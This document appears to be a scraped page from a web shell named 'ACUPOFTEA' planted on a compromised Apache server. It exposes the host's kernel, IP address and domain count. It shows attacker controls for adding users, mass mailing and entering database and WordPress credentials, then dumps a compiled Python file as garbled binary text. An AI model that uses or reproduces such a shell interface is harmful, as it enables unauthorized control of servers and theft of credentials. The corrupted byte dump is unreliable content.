System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
distutils
/
command
/
__pycache__
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
install_lib.cpython-36.pyc
3 \� � @ sL d Z ddlZddlZddlZddlmZ ddlmZ dZ G dd� de�Z dS )zkdistutils.command.install_lib Implements the Distutils 'install_lib' command (install all Python modules).� N)�Command)�DistutilsOptionErrorz.pyc @ s� e Zd ZdZd*d+d,d-d.d/d0gZdddgZddiZdd� Zdd� Zdd� Z dd� Z dd� Zd d!� Zd"d#� Z d$d%� Zd&d'� Zd(d)� ZdS )1�install_libz7install all Python modules (extensions and pure Python)�install-dir=�d�directory to install to� build-dir=�b�'build directory (where to install from)�force�f�-force installation (overwrite existing files)�compile�c�compile .py to .pyc [default]� no-compileN�don't compile .py files� optimize=�O�lalso compile with optimization: -O1 for "python -O", -O2 for "python -OO", and -O0 to disable [default: -O0]� skip-build�skip the build stepsc C s( d | _ d | _d| _d | _d | _d | _d S )Nr )�install_dir� build_dirr r �optimize� skip_build)�self� r �5/usr/lib64/python3.6/distutils/command/install_lib.py�initialize_options3 s zinstall_lib.initialize_optionsc C s� | j ddddddd� | jd kr&d | _| jd kr6d| _t| jt�s�yt| j�| _| jdkr^t�W n ttfk r� td��Y nX d S )N�install� build_libr r r r r r r TFr � � zoptimize must be 0, 1, or 2)r! r )r r )r r )r r )r r )r r )r r"